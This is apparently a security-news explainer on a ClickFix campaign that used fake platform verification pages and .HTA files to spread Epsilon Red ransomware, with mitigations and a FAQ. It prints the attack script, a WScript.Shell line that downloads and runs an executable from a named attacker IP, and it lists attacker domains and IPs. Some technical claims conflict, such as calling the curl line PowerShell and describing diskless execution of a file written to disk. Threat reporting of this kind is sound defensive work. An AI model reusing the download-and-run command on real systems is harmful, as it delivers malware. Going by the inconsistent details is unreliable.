What is the .HTA Red Ransomware attack and how are hackers using verification scams to infect victims?

In July 2025, cybersecurity researchers uncovered a new ransomware campaign using weaponized .HTA (HTML Application) files disguised as fake verification pages to spread the Epsilon Red ransomware. These pages, designed to mimic platforms like Discord, Twitch, Kick, and OnlyFans, trick users into clicking a “Verify” button. Once clicked, the page executes malicious scripts using ActiveX controls through Internet Explorer’s engine. These scripts download and run ransomware directly into the system without alerting users. The ransomware encrypts data, leaves a ransom note, and bypasses modern security protections like SmartScreen and antivirus tools. Victims are advised to disable ActiveX, block suspicious domains, and avoid unknown verification prompts.

  Security News & Threat Intelligence   Jul 28, 2025   28  Add to Reading List
What is the .HTA Red Ransomware attack and how are hackers using verification scams to infect victims?

Table of Contents

What Happened?

A new ransomware campaign has been discovered where hackers are using .HTA (HTML Application) files to install Epsilon Red ransomware on victims' computers. These .HTA files look like normal web pages but contain hidden malicious code.

The attackers are disguising these files as verification pages branded “ClickFix” on popular platforms like Discord, Twitch, Kick, and OnlyFans. Users are tricked into clicking on them, believing it's just part of a normal login or verification process.

How Does the Attack Work?

Here’s how this dangerous attack unfolds:

  1. User visits a fake verification page – It looks real and asks the user to “prove they are human.”

  2. User clicks a button – This triggers a redirect to another page with embedded code.

  3. Code runs in the background using ActiveX (Internet Explorer engine) – This allows it to bypass modern browser protections.

  4. Windows Script Host (WSH) runs hidden commands – A PowerShell command downloads and runs ransomware silently.

  5. The ransomware encrypts files and drops a ransom note – Just like many other ransomware types, victims are asked to pay for decryption.

Why Is This Attack Dangerous?

  • It uses outdated but still enabled technology (like ActiveX).

  • It bypasses antivirus and browser warnings.

  • Victims don’t even realize something was installed until it’s too late.

  • The ransomware runs without needing admin permissions—just normal user access is enough.

Infection Technique Breakdown

Here’s a simple breakdown of the malicious script used in the attack: 

var shell = new ActiveXObject("WScript.Shell");
shell.Run("cmd /c cd /D %userprofile% && curl -s -o a.exe http://155.94.155.227:2269/dw/vir.exe && a.exe", 0);

This code does three things:

  • Goes to your user directory.

  • Downloads the malware file (vir.exe).

  • Runs it silently in the background.

To make it more convincing, it then shows a fake code: 

shell.Run("cmd /c echo Your Verification Code Is: P3L9X & pause");

This keeps the user busy while the ransomware spreads.

Summary Table of Key Attack Details

Category Details
Attack Vector Fake ClickFix verification pages on Discord, Twitch, Kick, OnlyFans
Malware Used Epsilon Red Ransomware
Delivery Method Weaponized .HTA files with ActiveX + Windows Script Host
Code Execution JavaScript + mshta.exe + PowerShell
Ransom Note Style Similar to REvil, minor changes in grammar
Threat Actor Infra Domains: twtich[.]cc, capchabot[.]cc; IPs: 155.94.155.227, 213.209.150.188
Impact Full user-level file encryption, persistence, network scanning

How to Stay Safe From This Ransomware

Here are some steps users and organizations can take to protect themselves:

✅ Disable Legacy Technologies

  • Turn off ActiveX and Windows Script Host if not required.

  • Block Internet Explorer rendering engine in all modern browsers.

✅ Enforce Modern Security Policies

  • Use modern browsers like Chrome or Edge with SmartScreen enabled.

  • Avoid running .HTA files, especially if downloaded from the internet.

✅ Block Malicious Infrastructure

  • Blacklist domains and IPs mentioned in the report.

  • Monitor outbound connections to suspicious hosts.

✅ Educate Users

  • Run phishing simulations.

  • Train users to spot fake verification pages or suspicious popups.

Conclusion

This attack highlights how outdated technologies can still pose modern threats. The use of .HTA files, ActiveX controls, and Windows Script Host gives attackers a powerful way to infect systems quietly.

Users should be careful when asked to verify accounts on unknown websites. If something feels suspicious, it probably is.

Always double-check the URL, don't download unexpected files, and use security tools that monitor script-based threats.

Stay Cyber Safe

  • Update your systems regularly

  • Use strong antivirus tools with behavior-based detection

  • Disable unnecessary Windows features like ActiveX and WSH

  • Never download .hta, .exe, or .bat files from unknown sources

Frequently Asked Questions (FAQ)

What is a .HTA file and why is it dangerous?

A .HTA (HTML Application) file can execute scripts like JavaScript or VBScript on a system. It runs with the same privileges as an EXE file, making it dangerous when used maliciously.

How are hackers tricking users with these files?

Hackers create fake verification pages that look like real sites. When users click “Verify,” they unknowingly download and run .HTA files which install ransomware.

What is Epsilon Red ransomware?

Epsilon Red is a ransomware variant that encrypts data, demands payment, and often leaves minimal traces during the initial infection stage.

What platforms are being impersonated in this campaign?

Hackers are using fake versions of Discord, Twitch, Kick, and OnlyFans to lure users into clicking malicious links.

How does mshta.exe play a role in this attack?

The mshta.exe tool is used to run .HTA files. In this attack, it executes JavaScript that downloads ransomware in the background.

What is ActiveX and how is it exploited?

ActiveX is a legacy Windows component. Hackers use it to execute commands directly from the browser, especially using Internet Explorer’s engine.

Why is this attack hard to detect?

It runs scripts in memory without creating obvious files. This makes it harder for antivirus programs to catch it in time.

Are modern browsers safe from this attack?

Modern browsers are safer but if Internet Explorer components are still enabled, the system is at risk.

What command is used to install the ransomware?

A PowerShell-like command is used:

var shell = new ActiveXObject("WScript.Shell"); shell.Run("cmd /c curl -s -o a.exe http://... && a.exe", 0);

What kind of ransom note is left behind?

The ransom note mimics REvil’s style but with slight grammatical changes, showing it was likely created by a different group.

What IP addresses and domains were involved?

Domains like twtich[.]cc, capchabot[.]cc, and IPs 155.94.155.227:2269, 213.209.150.188:8112 were used in the campaign.

How can I protect my system from this threat?

Disable ActiveX and WScript, block the identified domains/IPs, and avoid clicking unknown verification links.

What is WScript.Shell used for in this attack?

It allows the script to run command-line actions in the background, like downloading and launching malware.

What does “diskless execution” mean?

The malware runs entirely in memory without writing files to disk, making it stealthy and hard to detect.

Are organizations at higher risk?

Yes, especially if they allow browser plugins or still use legacy components like ActiveX.

What is ClickFix in this campaign?

ClickFix is the fake brand used in the scam to convince users to go through a verification step.

How does the fake verification work?

It shows a page asking users to click a button to verify their identity. Clicking triggers the malicious download.

What type of user privileges does the malware get?

It runs with user-level permissions but can still encrypt files and access network resources.

What’s the role of Internet Explorer in this attack?

Though outdated, its rendering engine is used to support ActiveX in this scam.

Can antivirus software stop this?

Not always. Since the attack runs in memory and uses legit Windows tools, it can bypass many defenses.

What is schtasks and why is it used?

schtasks is a tool to schedule tasks in Windows. The malware uses it to maintain persistence after a reboot.

How does the fake verification distract users?

After running the malware, it shows a message like “Your Verification Code Is: P3L9X” to look legitimate.

How fast does Epsilon Red encrypt files?

It begins encryption almost immediately after installation, making quick detection difficult.

What kind of files are targeted by this ransomware?

It typically targets documents, images, and important data files for ransom leverage.

Is this campaign active globally?

Yes, users from multiple countries have reported infections from this scam.

Can I remove this ransomware without paying?

If backups exist and response is quick, yes. Otherwise, decryption is difficult without the attacker’s key.

How can enterprises stop such attacks?

Regular security training, disabling outdated technologies, and blocking suspicious network activity are key.

Why do attackers prefer .HTA files now?

They are less suspicious than .exe files and can easily bypass many browser download warnings.

How can I recognize a fake verification page?

Look at the domain name, lack of HTTPS, and unusual prompts to click or download something.

Should I stop using Internet Explorer completely?

Yes. It’s outdated and prone to security risks. Use modern browsers like Chrome or Firefox.

Is user education enough to stop this?

It helps a lot, but technical defenses like firewalls and endpoint protection are equally important.

Join Our Upcoming Class!

Tags